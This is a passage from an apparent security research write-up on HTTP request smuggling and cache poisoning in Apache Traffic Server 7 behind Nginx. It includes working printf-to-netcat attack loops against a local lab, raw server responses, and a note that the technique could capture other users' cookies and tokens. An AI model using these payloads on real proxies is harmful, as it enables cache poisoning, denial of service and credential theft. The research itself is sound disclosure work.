&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;X:_&amp;quot;%65532s&amp;quot;\r\n&amp;#39;&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; tr &lt;span class=&quot;s2&quot;&gt;&amp;quot; &amp;quot;&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot;=&amp;quot;&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; tr &lt;span class=&quot;s2&quot;&gt;&amp;quot;_&amp;quot;&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot; &amp;quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Try it against Nginx :&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET_/something.html?zorg=6_HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:_dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;X:_&amp;quot;%65532s&amp;quot;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET_http://dummy-host7.example.com/index.html?replaced=0&amp;amp;cache=8_HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;tr &lt;span class=&quot;s2&quot;&gt;&amp;quot; &amp;quot;&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot;1&amp;quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;tr &lt;span class=&quot;s2&quot;&gt;&amp;quot;_&amp;quot;&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot; &amp;quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;nc -q &lt;span class=&quot;m&quot;&gt;1&lt;/span&gt; 127.0.0.1 8002&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;I gat one error 400, that&#39;s the normal stuff. It Nginx does not like huge headers.&lt;/p&gt;

&lt;p&gt;Now try it against ATS7:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET_/something.html?zorg2=5_HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:_dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;X:_&amp;quot;%65534s&amp;quot;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET_http://dummy-host7.example.com/index.html?replaced=0&amp;amp;cache=8_HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;tr &lt;span class=&quot;s2&quot;&gt;&amp;quot; &amp;quot;&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot;1&amp;quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;tr &lt;span class=&quot;s2&quot;&gt;&amp;quot;_&amp;quot;&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot; &amp;quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;nc -q &lt;span class=&quot;m&quot;&gt;1&lt;/span&gt; 127.0.0.1 8007&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And after the error 400 we have a &lt;strong&gt;200 OK&lt;/strong&gt; response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header but we do not have the NULL character. But, yeah, 65000 character is very big, most actors would reject a query after 8000 characters on one line.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-http&quot; data-lang=&quot;http&quot;&gt;&lt;span class=&quot;kr&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;m&quot;&gt;400&lt;/span&gt; &lt;span class=&quot;ne&quot;&gt;Invalid HTTP Request&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 15:40:17 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Connection&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;keep-alive&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;ATS/7.1.1&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Cache-Control&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;no-store&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;text/html&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Language&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;en&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Length&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;220&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;HTML&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;HEAD&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;TITLE&amp;gt;&lt;/span&gt;Bad Request&lt;span class=&quot;nt&quot;&gt;&amp;lt;/TITLE&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/HEAD&amp;gt;&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;BODY&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;BGCOLOR=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;white&amp;quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;FGCOLOR=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;black&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;H1&amp;gt;&lt;/span&gt;Bad Request&lt;span class=&quot;nt&quot;&gt;&amp;lt;/H1&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;HR&amp;gt;&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;FONT&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;FACE=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;Helvetica,Arial&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&amp;lt;B&amp;gt;&lt;/span&gt;
Description: Could not process this request. 
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/B&amp;gt;&amp;lt;/FONT&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;HR&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/BODY&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;




&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-http&quot; data-lang=&quot;http&quot;&gt;&lt;span class=&quot;kr&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;m&quot;&gt;200&lt;/span&gt; &lt;span class=&quot;ne&quot;&gt;OK&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;ATS/7.1.1&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 15:40:17 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;text/html&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Length&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;120&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Last-Modified&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 14:16:28 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;ETag&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;&amp;quot;5bd321bc-78&amp;quot;&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Location-echo&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;/index.html?replaced=0&amp;amp;cache=8&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Default-VH&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;0&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Cache-Control&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;public, max-age=300&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Accept-Ranges&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;bytes&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Age&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;0&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Connection&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;keep-alive&lt;/span&gt;

$&lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;&lt;/span&gt;Nginx default static page&lt;span class=&quot;nt&quot;&gt;&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&amp;lt;h1&amp;gt;&lt;/span&gt;Hello World&lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;p&amp;gt;&lt;/span&gt;It works!&lt;span class=&quot;nt&quot;&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2&gt;Cache Poisoning using Incomplete Queries and Bad Separator Prefix&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Cache poisoning&lt;/strong&gt;, that&#39;s sound great. On smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why splitted pipelines are dangerous.&lt;/p&gt;

&lt;p&gt;ATS support an invalid header Syntax:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;HEADER[SPACE]:HEADER VALUE\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;That&#39;s not conform to &lt;a href=&quot;https://tools.ietf.org/html/rfc7230#section-3.3.2&quot;&gt;RFC7230 section 3.3.2&lt;/a&gt;:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;Each header field consists of a case-insensitive field name followed
by a colon (&quot;:&quot;), optional leading whitespace, the field value, and
optional trailing whitespace.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;So :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;HEADER:HEADER_VALUE\r\n =&amp;gt; OK
HEADER:[SPACE]HEADER_VALUE\r\n =&amp;gt; OK
HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n =&amp;gt; OK
HEADER[SPACE]:HEADER_VALUE\r\n =&amp;gt; NOT OK
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;And &lt;a href=&quot;https://tools.ietf.org/html/rfc7230#section-3.2.4&quot;&gt;RFC7230 section 3.2.4&lt;/a&gt; adds (bold added):&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;No whitespace is allowed between the header field-name and colon&lt;/strong&gt;.  In
the past, differences in the handling of such whitespace have led to
security vulnerabilities in request routing and response handling.  A
server MUST reject any received request message that contains
whitespace between a header field-name and colon with a response code
of 400 (Bad Request). A proxy MUST remove any such whitespace from a
response message before forwarding the message downstream.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;ATS will interpret the bad header, and also forward it without alterations.&lt;/p&gt;

&lt;p&gt;Using this flaw we can add some headers in our request that are &lt;strong&gt;invalid&lt;/strong&gt; for any
valid HTTP agents but still interpreted by ATS like:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;Content-Length :77\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Or (try it as an exercise)&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;Transfer-encoding :chunked\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Some HTTP servers will effectively reject such message with an error 400.
But some will simply &lt;em&gt;ignore&lt;/em&gt; the invalid header. That&#39;s the case of Nginx for example.&lt;/p&gt;

&lt;p&gt;ATS will maintain a keep-alive connection to the Nginx Backend, so we&#39;ll use this ignored header to transmit &lt;strong&gt;a body&lt;/strong&gt; (ATS think it&#39;s a body) that is in fact &lt;strong&gt;a new query&lt;/strong&gt; for the backend. And we&#39;ll make this query incomplete (missing a crlf
on end-of-header) to absorb a future query sent to Nginx. This sort of incomplete-query filled by the next coming query is also a basic Smuggling technique demonstrated 13 years ago.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-Control: max-age=200\r\n
04 X-info: evil 1.5 query, bad CL header\r\n
05 Content-Length :117\r\n
06 \r\n
07 GET /index.html?INJECTED=1 HTTP/1.1\r\n
08 Host: dummy-host7.example.com\r\n
09 X-info: evil poisoning query\r\n
10 Dummy-incomplete:
&lt;/code&gt;&lt;/pre&gt;

&lt;ul&gt;
&lt;li&gt;Line &lt;strong&gt;05&lt;/strong&gt; is invalid (&#39; :&#39;). But for ATS it is valid.&lt;/li&gt;
&lt;li&gt;Lines &lt;strong&gt;07/08/09/10&lt;/strong&gt; are just binary body data for ATS transmitted to backend.&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;For Nginx:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Line &lt;strong&gt;05&lt;/strong&gt; is ignored.&lt;/li&gt;
&lt;li&gt;Line &lt;strong&gt;07&lt;/strong&gt; is a new request (and first response is returned).&lt;/li&gt;
&lt;li&gt;Line &lt;strong&gt;10&lt;/strong&gt; has no &quot;\r\n&quot;. so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ...&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;Attack schema&lt;/h3&gt;

&lt;pre&gt;&lt;code&gt;[ATS Cache poisoning - space before header separator + backend ignoring bad headers]
Innocent        Attacker           ATS            Nginx
    |               |               |               |
    |               |--A(1A+1/2B)--&amp;gt;|               | * Issue 1 &amp;amp; 2 *
    |               |               |--A(1A+1/2B)--&amp;gt;| * Issue 3 *
    |               |               |&amp;lt;-A(404)-------|
    |               |               |            [1/2B]
    |               |&amp;lt;-A(404)-------|            [1/2B]
    |               |--C-----------&amp;gt;|            [1/2B]
    |               |               |--C-----------&amp;gt;| * ending B *
    |               |            [*CP*]&amp;lt;--B(200)----|
    |               |&amp;lt;--B(200)------|               |
    |--C---------------------------&amp;gt;|               |
    |&amp;lt;--B(200)--------------------[HIT]             |
&lt;/code&gt;&lt;/pre&gt;

&lt;ul&gt;
&lt;li&gt;1A + 1/2B means request A + an incomplete query B&lt;/li&gt;
&lt;li&gt;A(X) : means X query is hidden in body of query A&lt;/li&gt;
&lt;li&gt;CP : Cache poisoning&lt;/li&gt;
&lt;li&gt;Issue 1 : ATS transmit &#39;header[SPACE]: Value&#39;, a bad HTTP header.&lt;/li&gt;
&lt;li&gt;Issue 2 : ATS interpret this bad header as valid (so 1/2B still hidden in body)&lt;/li&gt;
&lt;li&gt;Issue 3 : Nginx encounter the bad header but ignore the header instead of
          sending an error 400. So 1/2B is discovered as a new query (no Content-length)
          request B contains an incomplete header (no crlf)&lt;/li&gt;
&lt;li&gt;ending B: the 1st line of query C ends the incomplete header of query B.
          all others headers are added to the query. C disappears and mix C
          HTTP credentials with all previous B headers (cookie/bearer token/Host, etc.)&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;Instead of cache poisoning you could also play with the incomplete &lt;code&gt;1/B&lt;/code&gt; query and wait for the Innocent query to finish this request with HTTP credentials of this user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will &lt;em&gt;simply&lt;/em&gt; demonstrate cache poisoning.&lt;/p&gt;

&lt;p&gt;Run this attack:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; i in &lt;span class=&quot;o&quot;&gt;{&lt;/span&gt;1..9&lt;span class=&quot;o&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;do&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /does-not-exists.html?cache=&amp;#39;&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39; HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Cache-Control: max-age=200\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;X-info: evil 1.5 query, bad CL header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-Length :117\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /index.html?INJECTED=&amp;#39;&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39; HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;X-info: evil poisoning query\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy-unterminated:&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;nc -q &lt;span class=&quot;m&quot;&gt;1&lt;/span&gt; 127.0.0.1 8007
&lt;span class=&quot;k&quot;&gt;done&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;It should work, Nginx adds an X-Location-echo header in this lab configuration, where we have
the first line of the query added on the response headers. This way we can observe that the second response is removing the real second query first line and replacing it with the hidden
first line.&lt;/p&gt;

&lt;p&gt;On my case the last query response contained:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt; X-Location-echo: /index.html?INJECTED=3
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;But this last query was &lt;code&gt;GET /index.html?INJECTED=9&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;You can check the cache content with:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; i in &lt;span class=&quot;o&quot;&gt;{&lt;/span&gt;1..9&lt;span class=&quot;o&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;do&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /does-not-exists.html?cache=&amp;#39;&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39; HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Cache-Control: max-age=200\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;nc -q &lt;span class=&quot;m&quot;&gt;1&lt;/span&gt; 127.0.0.1 8007
&lt;span class=&quot;k&quot;&gt;done&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;In my case I found 6 404 (regular) and 3 200 responses (ouch), the cache &lt;strong&gt;is&lt;/strong&gt; poisoned.&lt;/p&gt;

&lt;p&gt;If you want to go deeper in Smuggling understanding you should try to play with wireshark on this example. Do not forget to restart the cluster to empty the cache.&lt;/p&gt;

&lt;p&gt;Here we did not played with a C query yet, the cache poisoning occurs on our A query. Unless you consider the &lt;code&gt;/does-not-exists.html?cache=&#39;$i&#39;&lt;/code&gt; as C queries. But you can easily try to inject a C query on this cluster, where Nginx as some waiting requests, try to get it poisoned with &lt;code&gt;/index.html?INJECTED=3&lt;/code&gt; responses:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; i in &lt;span class=&quot;o&quot;&gt;{&lt;/span&gt;1..9&lt;span class=&quot;o&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;do&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /innocent-C-query.html?cache=&amp;#39;&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39; HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Cache-Control: max-age=200\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;nc -q &lt;span class=&quot;m&quot;&gt;1&lt;/span&gt; 127.0.0.1 8007
&lt;span class=&quot;k&quot;&gt;done&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;This may give you a touch on &lt;em&gt;real world&lt;/em&gt; exploitations, you have to repeat the attack to obtain something. Vary the number of servers on the cluster, the pools settings on the various layers of reverse proxies, etc. Things get complex. The easiest attack is to be a &lt;strong&gt;chaos generator&lt;/strong&gt; (defacement like or DOS), fine cache replacement of a target on the other hand requires fine study and a bit of luck.&lt;/p&gt;

&lt;p&gt;Does this work on port 8001 with HaProxy? well, no, of course. Our header syntax &lt;strong&gt;is invalid&lt;/strong&gt;. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue, to hide this bad request in a body. Or you would need a load balancer which does not detect this invalid syntax. Note that in this example the nginx behavior on invalid header syntax (ignore it) is also not standard (&lt;a href=&quot;https://trac.nginx.org/nginx/ticket/1014&quot;&gt;and wont be fixed, AFAIK&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;This invalid space prefix problem is the same issue as Apache httpd in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2016-8743&quot;&gt;CVE-2016-8743&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;HTTP Response Splitting: Content-Length Ignored on Cache Hit&lt;/h2&gt;

&lt;p&gt;Still there? Great! Because now is the nicest issue.&lt;/p&gt;

&lt;p&gt;At least for me it was the nicest issue. Mainly because I&#39;ve spend a lot of time around it without understanding it.&lt;/p&gt;

&lt;p&gt;I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce I had failures, and success on previoulsy undetected issues, and back to step1. Issues you cannot reproduce, you start doubting that you saw it before. Suddenly you find it back, but then no, etc. And of course I was not searching the root cause on the right examples. I was for example triggering tests on bad chunked transmissions, or delayed chunks.&lt;/p&gt;

&lt;p&gt;It was very a long (too long) time before I detected that all this was linked to the &lt;strong&gt;cache hit/cache miss&lt;/strong&gt; status of my requests.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On cache Hit Content-Length header on a GET query is not read.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That&#39;s so easy when you know it... And exploitation is also quite easy.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We can hide a second query in the first query body, and on cache Hit this body becomes a new query.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;This sort of query will get one response first (and, yes, that&#39;s only one query), on a second launch it will render two responses (so an HTTP request Splitting by definition):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;01 GET /index.html?cache=zorg42 HTTP/1.1\r\n
